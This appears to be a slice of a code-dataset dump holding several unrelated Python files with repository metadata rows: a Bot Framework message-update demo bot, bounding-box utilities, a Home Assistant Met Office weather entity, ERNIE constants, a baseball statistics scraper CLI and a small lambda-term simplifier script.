class ActivitiyUpdateAndDeleteBot(ActivityHandler):
    """Demo bot for updating and deleting previously sent activities.

    Each incoming message is echoed and its activity id remembered; every
    later message rewrites all remembered activities to the new text, and
    the literal message "delete" removes them all.
    """
    # NOTE(review): class name misspells "Activity"; kept as-is because
    # importers reference it by this name.

    def __init__(self, activity_ids):
        # Shared list of sent-activity ids (persists across turns).
        self.activity_ids = activity_ids

    async def on_message_activity(self, turn_context: TurnContext):
        # Strip an @-mention of the bot so commands like "delete" match.
        TurnContext.remove_recipient_mention(turn_context.activity)
        if turn_context.activity.text == "delete":
            for activity in self.activity_ids:
                await turn_context.delete_activity(activity)
            self.activity_ids = []
        else:
            await self._send_message_and_log_activity_id(
                turn_context, turn_context.activity.text
            )
            # Rewrite every remembered activity (including the one just sent)
            # to show the latest text.
            for activity_id in self.activity_ids:
                new_activity = MessageFactory.text(turn_context.activity.text)
                new_activity.id = activity_id
                await turn_context.update_activity(new_activity)

    async def _send_message_and_log_activity_id(
        self, turn_context: TurnContext, text: str
    ):
        """Send *text* as a message and remember the resulting activity id."""
        reply_activity = MessageFactory.text(text)
        resource_response = await turn_context.send_activity(reply_activity)
        self.activity_ids.append(resource_response.id)
| 38.470588 | 78 | 0.699541 | 1,137 | 0.869266 | 0 | 0 | 0 | 0 | 995 | 0.760703 | 100 | 0.076453 |
350ee2dd3bf8139a0a27fa5260ff00d59d16fd74 | 90 | py | Python | deliravision/torch/models/gans/deep_convolutional/__init__.py | delira-dev/vision_torch | d944aa67d319bd63a2add5cb89e8308413943de6 | [
"BSD-2-Clause"
] | 4 | 2019-08-03T09:56:50.000Z | 2019-09-05T09:32:06.000Z | deliravision/torch/models/gans/deep_convolutional/__init__.py | delira-dev/vision_torch | d944aa67d319bd63a2add5cb89e8308413943de6 | [
"BSD-2-Clause"
] | 23 | 2019-08-03T14:16:47.000Z | 2019-10-22T10:15:10.000Z | deliravision/torch/models/gans/deep_convolutional/__init__.py | delira-dev/vision_torch | d944aa67d319bd63a2add5cb89e8308413943de6 | [
"BSD-2-Clause"
] | null | null | null | from deliravision.models.gans.deep_convolutional.dc_gan import \
DeepConvolutionalGAN
| 30 | 64 | 0.844444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
350f3983aa26583c3a316ae8d7d678366a0569bd | 3,526 | py | Python | nobos_commons/utils/bounding_box_helper.py | noboevbo/nobos_commons | 471e52e10fd2228c106777c72d8439e58b047003 | [
"MIT"
] | 2 | 2020-06-03T16:28:44.000Z | 2020-10-10T03:07:23.000Z | nobos_commons/utils/bounding_box_helper.py | noboevbo/nobos_commons | 471e52e10fd2228c106777c72d8439e58b047003 | [
"MIT"
] | null | null | null | nobos_commons/utils/bounding_box_helper.py | noboevbo/nobos_commons | 471e52e10fd2228c106777c72d8439e58b047003 | [
"MIT"
] | 4 | 2020-10-10T03:07:25.000Z | 2021-09-30T01:11:02.000Z | import random
import sys
from nobos_commons.data_structures.bounding_box import BoundingBox
from nobos_commons.data_structures.bounding_box_3D import BoundingBox3D
from nobos_commons.data_structures.dimension import Coord2D, Coord3D
from nobos_commons.data_structures.skeletons.joint_2d import Joint2D
from nobos_commons.data_structures.skeletons.joint_3d import Joint3D
from nobos_commons.data_structures.skeletons.skeleton_joints_base import SkeletonJointsBase
def get_human_bounding_box_from_joints(joints: SkeletonJointsBase[Joint2D], max_x_val: int = sys.maxsize,
                                       max_y_val: int = sys.maxsize):
    """Return a 2D person bounding box around the given joints.

    The tight box is padded by 15% of its extent on every side, then
    clamped to [0, max_x_val] x [0, max_y_val]; coordinates are cast to int.
    """
    xs = [joint.x for joint in joints]
    ys = [joint.y for joint in joints]
    min_x = min(xs, default=sys.maxsize)
    min_y = min(ys, default=sys.maxsize)
    max_x = max(xs, default=0)
    max_y = max(ys, default=0)
    # Pad by 15% of the tight box's width/height.
    pad_x = 0.15 * (max_x - min_x)
    pad_y = 0.15 * (max_y - min_y)
    min_x -= pad_x
    min_y -= pad_y
    max_x += pad_x
    max_y += pad_y
    # Clamp to the image bounds.
    min_x = min_x if min_x > 0 else 0
    min_y = min_y if min_y > 0 else 0
    max_x = max_x if max_x < max_x_val else max_x_val
    max_y = max_y if max_y < max_y_val else max_y_val
    return BoundingBox(top_left=Coord2D(x=int(min_x), y=int(min_y)),
                       bottom_right=Coord2D(x=int(max_x), y=int(max_y)), label="person")
def get_human_bounding_box_3D_from_joints(joints: SkeletonJointsBase[Joint3D], max_x_val: int = sys.maxsize,
                                          max_y_val: int = sys.maxsize,
                                          max_z_val: int = sys.maxsize):
    """Return a 3D person bounding box around the given joints.

    The tight box is padded by 15% of its extent per axis, then clamped to
    [0, max_*_val] on each axis; coordinates stay floats.
    """
    xs = [joint.x for joint in joints]
    ys = [joint.y for joint in joints]
    zs = [joint.z for joint in joints]
    min_x = min(xs, default=sys.maxsize)
    min_y = min(ys, default=sys.maxsize)
    min_z = min(zs, default=sys.maxsize)
    max_x = max(xs, default=0)
    max_y = max(ys, default=0)
    max_z = max(zs, default=0)
    # Pad by 15% of the tight box's extent on each axis.
    pad_x = 0.15 * (max_x - min_x)
    pad_y = 0.15 * (max_y - min_y)
    pad_z = 0.15 * (max_z - min_z)
    min_x -= pad_x
    min_y -= pad_y
    min_z -= pad_z
    max_x += pad_x
    max_y += pad_y
    max_z += pad_z
    # Clamp to the allowed volume.
    min_x = min_x if min_x > 0 else 0
    min_y = min_y if min_y > 0 else 0
    min_z = min_z if min_z > 0 else 0
    max_x = max_x if max_x < max_x_val else max_x_val
    max_y = max_y if max_y < max_y_val else max_y_val
    max_z = max_z if max_z < max_z_val else max_z_val
    return BoundingBox3D(top_left=Coord3D(x=min_x, y=min_y, z=min_z),
                         bottom_right=Coord3D(x=max_x, y=max_y, z=max_z), label="person")
def get_random_bounding_box(width, height, bb_min_size=(5, 5)):
    """Return a random BoundingBox inside a width x height frame whose sides
    are each at least bb_min_size."""
    min_w, min_h = bb_min_size
    left = random.randrange(0, width - min_w)
    top = random.randrange(0, height - min_h)
    right = random.randrange(left + min_w, width)
    bottom = random.randrange(top + min_h, height)
    return BoundingBox(top_left=Coord2D(x=left, y=top), bottom_right=Coord2D(x=right, y=bottom))
| 35.979592 | 108 | 0.657969 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 16 | 0.004538 |
351065226af5d5b96c95ebd5533ca34ea88bb7fd | 4,556 | py | Python | homeassistant/components/metoffice/weather.py | tbarbette/core | 8e58c3aa7bc8d2c2b09b6bd329daa1c092d52d3c | [
"Apache-2.0"
] | 6 | 2017-08-02T19:26:39.000Z | 2020-03-14T22:47:41.000Z | homeassistant/components/metoffice/weather.py | tbarbette/core | 8e58c3aa7bc8d2c2b09b6bd329daa1c092d52d3c | [
"Apache-2.0"
] | 60 | 2020-08-03T07:32:56.000Z | 2022-03-31T06:02:07.000Z | homeassistant/components/metoffice/weather.py | tbarbette/core | 8e58c3aa7bc8d2c2b09b6bd329daa1c092d52d3c | [
"Apache-2.0"
] | 14 | 2018-08-19T16:28:26.000Z | 2021-09-02T18:26:53.000Z | """Support for UK Met Office weather service."""
from homeassistant.components.weather import WeatherEntity
from homeassistant.const import LENGTH_KILOMETERS, TEMP_CELSIUS
from homeassistant.core import callback
from homeassistant.helpers.typing import ConfigType, HomeAssistantType
from .const import (
ATTRIBUTION,
CONDITION_CLASSES,
DEFAULT_NAME,
DOMAIN,
METOFFICE_COORDINATOR,
METOFFICE_DATA,
METOFFICE_NAME,
VISIBILITY_CLASSES,
VISIBILITY_DISTANCE_CLASSES,
)
async def async_setup_entry(
    hass: HomeAssistantType, entry: ConfigType, async_add_entities
) -> None:
    """Set up the Met Office weather sensor platform."""
    # Integration data was stored by __init__ under this entry's id.
    hass_data = hass.data[DOMAIN][entry.entry_id]

    async_add_entities(
        [
            MetOfficeWeather(
                entry.data,
                hass_data,
            )
        ],
        False,  # entity does not poll; it listens to the coordinator
    )
class MetOfficeWeather(WeatherEntity):
    """Implementation of a Met Office weather condition."""

    def __init__(self, entry_data, hass_data):
        """Initialise the platform with a data instance."""
        self._data = hass_data[METOFFICE_DATA]
        self._coordinator = hass_data[METOFFICE_COORDINATOR]

        self._name = f"{DEFAULT_NAME} {hass_data[METOFFICE_NAME]}"
        self._unique_id = f"{self._data.latitude}_{self._data.longitude}"

        # Latest observation; None until the coordinator delivers data.
        self.metoffice_now = None

    @property
    def name(self):
        """Return the name of the sensor."""
        return self._name

    @property
    def unique_id(self):
        """Return the unique of the sensor."""
        return self._unique_id

    @property
    def condition(self):
        """Return the current condition."""
        # Map the Met Office weather code to the HA condition whose
        # CONDITION_CLASSES bucket contains it.
        return (
            [
                k
                for k, v in CONDITION_CLASSES.items()
                if self.metoffice_now.weather.value in v
            ][0]
            if self.metoffice_now
            else None
        )

    @property
    def temperature(self):
        """Return the platform temperature."""
        return (
            self.metoffice_now.temperature.value
            if self.metoffice_now and self.metoffice_now.temperature
            else None
        )

    @property
    def temperature_unit(self):
        """Return the unit of measurement."""
        return TEMP_CELSIUS

    @property
    def visibility(self):
        """Return the platform visibility."""
        _visibility = None
        # Combine the textual class and its distance range, e.g.
        # "Good - 10-20" (labels per VISIBILITY_*_CLASSES).
        if hasattr(self.metoffice_now, "visibility"):
            _visibility = f"{VISIBILITY_CLASSES.get(self.metoffice_now.visibility.value)} - {VISIBILITY_DISTANCE_CLASSES.get(self.metoffice_now.visibility.value)}"
        return _visibility

    @property
    def visibility_unit(self):
        """Return the unit of measurement."""
        return LENGTH_KILOMETERS

    @property
    def pressure(self):
        """Return the mean sea-level pressure."""
        return (
            self.metoffice_now.pressure.value
            if self.metoffice_now and self.metoffice_now.pressure
            else None
        )

    @property
    def humidity(self):
        """Return the relative humidity."""
        return (
            self.metoffice_now.humidity.value
            if self.metoffice_now and self.metoffice_now.humidity
            else None
        )

    @property
    def wind_speed(self):
        """Return the wind speed."""
        return (
            self.metoffice_now.wind_speed.value
            if self.metoffice_now and self.metoffice_now.wind_speed
            else None
        )

    @property
    def wind_bearing(self):
        """Return the wind bearing."""
        return (
            self.metoffice_now.wind_direction.value
            if self.metoffice_now and self.metoffice_now.wind_direction
            else None
        )

    @property
    def attribution(self):
        """Return the attribution."""
        return ATTRIBUTION

    async def async_added_to_hass(self) -> None:
        """Set up a listener and load data."""
        self.async_on_remove(
            self._coordinator.async_add_listener(self._update_callback)
        )
        self._update_callback()

    @callback
    def _update_callback(self) -> None:
        """Load data from integration."""
        self.metoffice_now = self._data.now
        self.async_write_ha_state()

    @property
    def should_poll(self) -> bool:
        """Entities do not individually poll."""
        return False

    @property
    def available(self):
        """Return if state is available."""
        return self.metoffice_now is not None
| 27.95092 | 163 | 0.620939 | 3,670 | 0.805531 | 0 | 0 | 2,848 | 0.62511 | 614 | 0.134767 | 1,014 | 0.222564 |
35113f1d050dde439e758f95376f877e2f9194b9 | 5,816 | py | Python | erniekit/common/rule.py | PaddlePaddle/LARK | 94a2367ba7f0f83b48330233450ea095d8dc9382 | [
"Apache-2.0"
] | 1,552 | 2019-03-03T19:52:07.000Z | 2019-07-19T06:47:57.000Z | erniekit/common/rule.py | PaddlePaddle/LARK | 94a2367ba7f0f83b48330233450ea095d8dc9382 | [
"Apache-2.0"
] | 154 | 2019-03-06T08:19:57.000Z | 2019-07-19T02:52:22.000Z | erniekit/common/rule.py | PaddlePaddle/LARK | 94a2367ba7f0f83b48330233450ea095d8dc9382 | [
"Apache-2.0"
] | 382 | 2019-03-04T13:37:01.000Z | 2019-07-19T06:33:44.000Z | # -*- coding: utf-8 -*
"""
some rule
"""
class MaxTruncation(object):
    """Truncation strategies for over-long sequences."""
    KEEP_HEAD = 0  # truncate from the start up to the max length
    KEEP_TAIL = 1  # truncate from the start to max_len-1, then append the last id (word or char)
    KEEP_BOTH_HEAD_TAIL = 2  # reserve head and tail positions, then truncate as in KEEP_HEAD
class EmbeddingType(object):
    """Embedding type that text data should be converted to: none or ERNIE."""
    NONE_EMBEDDING = 0  # no embedding needed
    ERNIE_EMBEDDING = 1  # generate embedding with ERNIE
    FLUID_EMBEDDING = 2  # generate embedding with fluid ops
class FluidDataType(object):
    """Lightweight descriptor of a paddle/fluid tensor: shape, dtype,
    LoD (level-of-detail) level and an optional variable name."""

    def __init__(self, shape, dtype, lod_level, name=None):
        self.shape = shape          # tensor shape, e.g. [-1, seq_len]
        self.dtype = dtype          # dtype string, e.g. 'int64'
        self.lod_level = lod_level  # nested-sequence depth
        self.name = name            # optional variable name

    def __repr__(self):
        # Debug-friendly representation listing all four fields.
        return '{}(shape={!r}, dtype={!r}, lod_level={!r}, name={!r})'.format(
            type(self).__name__, self.shape, self.dtype, self.lod_level, self.name)
class WordPieceType(object):
    """Token types under mixed char/word segmentation."""
    SINGLE_TOKEN = 0  # a single character
    WORD_START = 1  # first character of a word
    WORD_INCLUDE = 2  # interior character of a word
class DataShape(object):
    """Input data types."""
    STRING = "string"  # string
    INT = "int"  # int64
    FLOAT = "float"  # float32
class InstanceName(object):
    """Commonly used field / variable names shared across the toolkit."""
    RECORD_ID = "id"
    RECORD_EMB = "emb"
    SRC_IDS = "src_ids"
    WORDSEG_IDS = "wordseg_ids"
    MASK_IDS = "mask_ids"
    LOSS_MASK = "loss_mask"
    SEQ_LENS = "seq_lens"
    SENTENCE_IDS = "sent_ids"
    POS_IDS = "pos_ids"
    TASK_IDS = "task_ids"
    PHONETIC_A_IDS = "phonetic_a_ids"
    PHONETIC_B_IDS = "phonetic_b_ids"
    GLYPH_A_IDS = "glyph_a_ids"
    GLYPH_B_IDS = "glyph_b_ids"
    GLYPH_C_IDS = "glyph_c_ids"
    GLYPH_D_IDS = "glyph_d_ids"
    REL_POS_IDS="rel_pos_ids"
    DEEP_IDS = "deep_ids"
    BEG_IDS = "beg_ids"
    END_IDS = "end_ids"

    # keys for generation training
    TGT_LABEL = "tgt_label"
    TGT_POS = "tgt_pos"
    # keys for generation decoding
    TGT_SRC_IDS = "tgt_src_ids"
    TGT_POS_IDS = "tgt_pos_ids"
    INIT_SCORES = "init_scores"
    PARENT_IDX = "parent_idx"
    TGT_MASK_IDS = 'tgt_mask_ids'
    DATA_IDS = 'data_ids'
    # keys for multi-turn dialogue
    ROLE_IDS = "role_ids"
    TURN_IDS = "turn_ids"
    TGT_PHONETIC_A_IDS = "tgt_phonetic_a_ids"
    TGT_PHONETIC_B_IDS = "tgt_phonetic_b_ids"
    TGT_GLYPH_A_IDS = "tgt_glyph_a_ids"
    TGT_GLYPH_B_IDS = "tgt_glyph_b_ids"
    TGT_GLYPH_C_IDS = "tgt_glyph_c_ids"
    TGT_GLYPH_D_IDS = "tgt_glyph_d_ids"

    # keys for the seq2seq label field
    TRAIN_LABEL_SRC_IDS = "train_label_src_ids"
    TRAIN_LABEL_MASK_IDS = "train_label_mask_ids"
    TRAIN_LABEL_SEQ_LENS = "train_label_seq_lens"
    INFER_LABEL_SRC_IDS = "infer_label_src_ids"
    INFER_LABEL_MASK_IDS = "infer_label_mask_ids"
    INFER_LABEL_SEQ_LENS = "infer_label_seq_lens"

    # keys related to term rank
    TERM_POS = "term_pos"
    TERM_TOKENS_NUMS = "term_tokens_nums"
    TERM_INDEX = "term_index"
    TERM_PAIRS = "term_pairs"
    TERM_DIFFS = "term_diffs"

    SEQUENCE_EMB = "sequence_output"  # token-level embedding
    POOLED_EMB = "pooled_output"  # sentence-level embedding

    TARGET_FEED = "target_feed"  # needed when saving a model: variables (tensor or variable) fed at inference time
    TARGET_FEED_NAMES = "target_feed_name"  # needed when saving a model: names and order of the inference inputs
    TARGET_PREDICTS = "target_predicts"  # needed when saving a model: final outputs produced at inference time
    PREDICT_RESULT = "predict_result"  # prediction results passed around during training
    STUDENT_PREDICT_RESULT = "student_predict_result"  # student predictions passed around during training
    TEACHER_PREDICT_RESULT = "teacher_predict_result"  # teacher predictions passed around during training
    LABEL = "label"  # label

    TEACHER_CE_LOSS = "teacher_ce_loss"
    STUDENT_CE_LOSS = "student_ce_loss"
    DISTILL_LOSS = "distill_loss"
    PRED_LOSS = "pred_loss"

    LOSS = "loss"  # loss
    # CRF_EMISSION = "crf_emission"  # crf_emission

    TRAINING = "training"  # training phase
    EVALUATE = "evaluate"  # evaluation phase
    TEST = "test"  # test phase
    SAVE_INFERENCE = "save_inference"  # phase that saves the inference model
    INFERENCE = "inference"  # inference phase

    STEP = "steps"
    SPEED = "speed"
    TIME_COST = "time_cost"
    GPU_ID = "gpu_id"

    FILE_CHECKPOINTS = "checkpoints"
    FILE_INFERENCE_MODEL = "inference_model"

    TYPE_PY_READER = "py_reader"
    TYPE_DATA_LOADER = "data_loader"

    # ERNIE-VIL related keys
    IMAGE_PIXEL_IDS = "image_pixel_ids"
    IMAGE_POSITION = "image_position"
    IMAGE_TAG_IDS = "image_tag_ids"
    TEXT_INDEX = "text_index"
    IMAGE_INDEX = "image_index"
    POS_INDEX = "pos_index"

    # ERNIE-Layout related keys
    POS_2D_IDS = "pos_2d_ids"
    SEGMENT_IDS = "segment_ids"

    # DynaBERT related keys
    HIDDEN_LAYERS = "hidden_layers"
    LOGIT = "logit"

    # prompt related keys
    LABEL_MAP_IDS = "label_map_ids"
    LABEL_TEXT_IDS = "label_text_ids"

    BATCH_SIZE = "batch_size"
    MAX_SEQ_LEN = "max_seq_len"
class FieldLength(object):
    """How many slots each field type occupies when serialized into a
    field_id_list."""
    CUSTOM_TEXT_FIELD = 3
    ERNIE_TEXT_FIELD = 6
    SINGLE_SCALAR_FIELD = 1
    ARRAY_SCALAR_FIELD = 2
    BASIC_TEXT_FIELD = 2
    GENERATE_LABEL_FIELD = 6
    ERNIE_TERM_RANK_TEXT_FIELD = 9
    ERNIT_TERM_RANK_LABEL_FIELD = 4

    # ERNIE-VIL RELATED VARIABLES
    ERNIEVIL_IMAGE_PIXEL_FIELD = 1
    ERNIEVIL_IMAGE_TAGS_FIELD = 1

    # ERNIE-Layout RELATED VARIABLES
    ERNIE_LAYOUT_SEQLABEL_FIELD = 10
class FleetMode(object):
    """Fleet (distributed training) modes."""
    NO_FLEET = "NO_FLEET"
    CPU_MODE = "CPU"
    GPU_MODE = "GPU"
class UploadModelType(object):
    """Model upload types."""
    UPLOAD_HDFS_IMMEDIATE = "immediate"  # upload to HDFS in real time
    UPLOAD_HDFS_LAST_TIME = "last_time"  # uploaded in bulk by the paddlecloud platform after training finishes
class StoreModelType(object):
    """Model storage backends."""
    STORE_HDFS = "hadoop"  # store on a hadoop cluster
    STORE_IREPO = "irepo"  # store in the irepo model repository
class EncryptType(object):
    """Model encryption modes."""
    ENCRYPT_NONE = None  # no encryption
    ENCRYPT_MEMORY = "memory"  # in-memory encryption
    ENCRYPT_FILE = "file"  # file encryption
class InferenceRetcode(object):
    """Return codes of the inference service."""
    RET_OK = 200
    LOAD_JSON_FAILED = 201
    MISSING_FIELD = 202
class GraphMode(object):
    """Graph execution modes."""
    # dynamic graph (eager execution)
    DYGRAPH = "dynamic"
    # static graph
    STATIC = "static"
| 25.734513 | 80 | 0.678817 | 6,561 | 0.988102 | 0 | 0 | 0 | 0 | 0 | 0 | 3,238 | 0.487651 |
3513f46bb42fac991ca739cdee5e8eb27738239d | 8,511 | py | Python | bbscrape/__main__.py | luciancooper/bbcmd | 307aea02d245b3d217bb1a7f76a985b98da54e40 | [
"MIT"
] | 2 | 2018-12-07T20:13:03.000Z | 2020-06-03T11:34:59.000Z | bbscrape/__main__.py | luciancooper/bbcmd | 307aea02d245b3d217bb1a7f76a985b98da54e40 | [
"MIT"
] | null | null | null | bbscrape/__main__.py | luciancooper/bbcmd | 307aea02d245b3d217bb1a7f76a985b98da54e40 | [
"MIT"
] | null | null | null | import sys,argparse
from cmdprogress.bar import ProgBar
def parse_years(arg):
    """Parse a year spec like '2010-2012,2015' into a sorted list of ints.

    Comma-separated tokens are either single years or inclusive
    hyphenated ranges; duplicates are collapsed.
    """
    years = set()
    for token in arg.split(','):
        if '-' in token:
            bounds = token.split('-')
            years.update(range(int(bounds[0]), int(bounds[1]) + 1))
        else:
            years.add(int(token))
    return sorted(years)
# ------------------------------------------------ spotrac ------------------------------------------------ #
def sr_captable(args):
    """Scrape spotrac cap tables for args.years, writing CSV rows to stdout."""
    from .spotrac import spotrac_keys,spotrac_captable
    keys = [*spotrac_keys(args.years)]
    print('scraping spotrac captables',file=sys.stderr)
    prog = ProgBar().iter(keys)
    # First table is printed in full (including its header row)...
    for l in spotrac_captable(*next(prog)):
        print(l,file=sys.stdout)
    # ...subsequent tables skip their header row via next(tbl).
    for year,team,url in prog:
        tbl = iter(spotrac_captable(year,team,url))
        next(tbl)
        for l in tbl:
            print(l,file=sys.stdout)
def sr_playertable(args):
    """Scrape spotrac player tables for args.years, writing CSV rows to stdout."""
    from .spotrac import spotrac_keys,spotrac_playertable
    keys = [*spotrac_keys(args.years)]
    print('scraping spotrac playertables',file=sys.stderr)
    prog = ProgBar().iter(keys)
    # First table keeps its header row; later tables drop theirs.
    for l in spotrac_playertable(*next(prog)):
        print(l,file=sys.stdout)
    for year,team,url in prog:
        tbl = iter(spotrac_playertable(year,team,url))
        next(tbl)
        for l in tbl:
            print(l,file=sys.stdout)
# ------------------------------------------------ fangraphs ------------------------------------------------ #
def fg_advbat(args):
    """Scrape fangraphs advanced batting for args.years, writing CSV to stdout."""
    from .fangraphs import fg_playerkeys,fg_advanced_batting
    keys = fg_playerkeys(args.years)
    print('scraping fangraphs advance batting',file=sys.stderr)
    prog = ProgBar().iter(keys)
    # First player's table keeps its header row; later tables drop theirs.
    for l in fg_advanced_batting(*next(prog),args.years):
        print(l,file=sys.stdout)
    for fgid,pos in prog:
        tbl = iter(fg_advanced_batting(fgid,pos,args.years))
        next(tbl)
        for l in tbl:
            print(l,file=sys.stdout)
def fg_parkfactor(args):
    """Scrape fangraphs park factors for args.years, writing CSV to stdout."""
    from .fangraphs import fg_park_factors
    print('scraping fangraphs parkfactors',file=sys.stderr)
    prog = ProgBar().iter(args.years)
    # First year's table keeps its header row; later tables drop theirs.
    for l in fg_park_factors(next(prog)):
        print(l,file=sys.stdout)
    for year in prog:
        tbl = iter(fg_park_factors(year))
        next(tbl)
        for l in tbl:
            print(l,file=sys.stdout)
def fg_playerid(args):
    """Scrape all fangraphs player ids (one alphabet page at a time) to stdout."""
    from .fangraphs import fg_player_alphabet_links,fg_player_ids
    print('scraping fangraphs player ids',file=sys.stderr)
    alinks = [*fg_player_alphabet_links()]
    # CSV header emitted once up front.
    print('fgid,player_name,position,first_year,last_year',file=sys.stdout)
    for link in ProgBar().iter(alinks):
        for l in fg_player_ids(link):
            print(l,file=sys.stdout)
# ------------------------------------------------ bbr ------------------------------------------------ #
def bbr_team(args):
    """Scrape a named team table from baseball-reference for the selected
    teams/years, writing CSV rows to stdout.  At least one of -t/-y is required."""
    from .baseball_reference import bbr_teamkeys,bbr_team_table
    if args.team == None and args.years==None:
        print("Error: Need to provide at least a team(s) -t <team> or a year(s) -y <year> to scrape data from",file=sys.stderr)
        return
    keys = bbr_teamkeys(team=args.team,year=args.years)
    print("scraping team '{}' tables from baseball-reference.com".format(args.tableid),file=sys.stderr)
    prog = ProgBar().iter(keys)
    # First table keeps its header row; later tables drop theirs.
    for l in bbr_team_table(*next(prog),args.tableid):
        print(l,file=sys.stdout)
    for year,team in prog:
        tbl = iter(bbr_team_table(year,team,args.tableid))
        next(tbl)
        for l in tbl:
            print(l,file=sys.stdout)
def bbr_salary(args):
    """Scrape salary tables from baseball-reference for the selected
    teams/years, writing CSV rows to stdout.  At least one of -t/-y is required."""
    from .baseball_reference import bbr_teamkeys,bbr_salary_table
    if args.team == None and args.years==None:
        print("Error: Need to provide at least a team(s) -t <team> or a year(s) -y <year> to scrape data from",file=sys.stderr)
        return
    keys = bbr_teamkeys(team=args.team,year=args.years)
    print("scraping salary tables from baseball-reference.com",file=sys.stderr)
    prog = ProgBar().iter(keys)
    # First table keeps its header row; later tables drop theirs.
    for l in bbr_salary_table(*next(prog)):
        print(l,file=sys.stdout)
    for year,team in prog:
        tbl = iter(bbr_salary_table(year,team))
        next(tbl)
        for l in tbl:
            print(l,file=sys.stdout)
def bbr_teamid(args):
    """Scrape team ids from baseball-reference for args.years, writing CSV to stdout."""
    from .baseball_reference import bbr_teamids_year
    print("scraping teamids from baseball-reference.com",file=sys.stderr)
    prog = ProgBar().iter(args.years)
    # First year's table keeps its header row; later tables drop theirs.
    for l in bbr_teamids_year(next(prog)):
        print(l,file=sys.stdout)
    for year in prog:
        tbl = iter(bbr_teamids_year(year))
        next(tbl)
        for l in tbl:
            print(l,file=sys.stdout)
def main():
    """Entry point: build the bbscrape argparse CLI and dispatch to the
    selected scraper via ``args.run(args)``."""
    parser = argparse.ArgumentParser(prog='bbscrape',description='Baseball Data Scraper',epilog='Please consult https://github.com/luciancooper/bbcmd for further instruction')
    subparsers = parser.add_subparsers(title="available data sources",metavar='source')

    # ------------------------------------------------ year ------------------------------------------------ #
    # Shared positional 'years' argument, reused by most subcommands.
    year_parser = argparse.ArgumentParser(add_help=False)
    year_parser.add_argument('years',type=parse_years,help='Seasons to scrape data for')

    # ------------------------------------------------ fangraphs ------------------------------------------------ #
    parser_fg = subparsers.add_parser('fg', help='scrape data from fangraphs.com',description="Scrapes data from fangraphs.com")
    parser_fg_subparsers = parser_fg.add_subparsers(title="available scraping commands",metavar='command')
    # advbat
    parser_fg_advbat = parser_fg_subparsers.add_parser('advbat',parents=[year_parser],help="scrape adv batting tables")
    parser_fg_advbat.set_defaults(run=fg_advbat)
    # parkfactor
    parser_fg_parkfactor = parser_fg_subparsers.add_parser('parkfactor',parents=[year_parser],help="scrape parkfactor tables")
    parser_fg_parkfactor.set_defaults(run=fg_parkfactor)
    # playerid
    parser_fg_playerid = parser_fg_subparsers.add_parser('playerid',parents=[year_parser],help="scrape fangraphs playerids")
    parser_fg_playerid.set_defaults(run=fg_playerid)

    # ------------------------------------------------ bbr ------------------------------------------------ #
    parser_bbr = subparsers.add_parser('bbr', help='scrape data from baseball-reference.com',description="Scrapes data from baseball-reference.com")
    parser_bbr_subparsers = parser_bbr.add_subparsers(title="available scraping commands",metavar='command')
    # bbr_team
    parser_bbr_team = parser_bbr_subparsers.add_parser('team',help="scrape bbr team tables")
    parser_bbr_team.add_argument('tableid',metavar='tableid',choices=['players_value_batting','players_value_pitching','standard_fielding','appearances'],help="ID of table to scrape: 'players_value_batting','players_value_pitching','standard_fielding','appearances'")
    parser_bbr_team.add_argument('-y','--years',type=parse_years,required=False,help='target years')
    parser_bbr_team.add_argument('-t','--team',type=str,required=False,help='target teams')
    parser_bbr_team.set_defaults(run=bbr_team)
    # bbr_salary
    parser_bbr_salary = parser_bbr_subparsers.add_parser('salary',help="scrape bbr salary tables")
    parser_bbr_salary.add_argument('-y','--years',type=parse_years,required=False,help='target years')
    parser_bbr_salary.add_argument('-t','--team',type=str,required=False,help='target teams')
    parser_bbr_salary.set_defaults(run=bbr_salary)
    # bbr_teamid
    parser_bbr_teamid = parser_bbr_subparsers.add_parser('teamid',parents=[year_parser],help="scrape bbr teamids")
    parser_bbr_teamid.set_defaults(run=bbr_teamid)

    # ------------------------------------------------ spotrac ------------------------------------------------ #
    parser_sr = subparsers.add_parser('sr', help='scrape data from spotrac.com',description="Scrapes salary datae from spotrac.com")
    parser_sr_subparsers = parser_sr.add_subparsers(title="available scraping commands",metavar='command')
    # playertable
    parser_sr_playertable = parser_sr_subparsers.add_parser('playertable',parents=[year_parser],help="scrape player tables")
    parser_sr_playertable.set_defaults(run=sr_playertable)
    # captable
    parser_sr_captable = parser_sr_subparsers.add_parser('captable',parents=[year_parser],help="scrape cap tables")
    parser_sr_captable.set_defaults(run=sr_captable)

    # ------------------------------------------------ ------------------------------------------------ #
    args = parser.parse_args()
    args.run(args)
| 44.328125 | 267 | 0.639055 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,604 | 0.305957 |
35150cb503f38ff16ebcf6a4b42f07d3240178e6 | 409 | py | Python | src/reducer/bohm_debug.py | fritzo/pomagma | 224bb6adab3fc68e2d853e6365b4b86a8f7f468f | [
"Apache-2.0"
] | 10 | 2015-06-09T00:25:01.000Z | 2019-06-11T16:07:31.000Z | src/reducer/bohm_debug.py | fritzo/pomagma | 224bb6adab3fc68e2d853e6365b4b86a8f7f468f | [
"Apache-2.0"
] | 25 | 2015-03-23T23:16:01.000Z | 2017-08-29T03:35:59.000Z | src/reducer/bohm_debug.py | fritzo/pomagma | 224bb6adab3fc68e2d853e6365b4b86a8f7f468f | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import os

# Set before any pomagma import so the level takes effect — presumably the
# log level is read at import time (hence the isort:skip markers below).
os.environ['POMAGMA_LOG_LEVEL'] = '3'
from pomagma.compiler.util import temp_memoize  # isort:skip
from pomagma.reducer import bohm  # isort:skip

print('Example 1.')
with temp_memoize():
    bohm.sexpr_simplify('(ABS (ABS (1 0 (1 0))) (ABS (ABS (1 (0 0)))))')

print('Example 2.')
with temp_memoize():
    bohm.sexpr_simplify('(ABS (ABS (0 1 1)) (ABS (ABS (1 (0 0)))))')
| 21.526316 | 72 | 0.655257 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 181 | 0.442543 |
3515dc84f9b841feb94f0bde119df749e97f2631 | 4,709 | py | Python | scaper_concept/venv/lib/python3.9/site-packages/celery/utils/debug.py | edudbot/web-scraper | 12c07f805427699b2c3a35ed7c0d7efbc3673a7f | [
"MIT"
] | 3 | 2022-02-11T12:09:29.000Z | 2022-02-12T19:13:17.000Z | scaper_concept/venv/lib/python3.9/site-packages/celery/utils/debug.py | edudbot/web-scraper | 12c07f805427699b2c3a35ed7c0d7efbc3673a7f | [
"MIT"
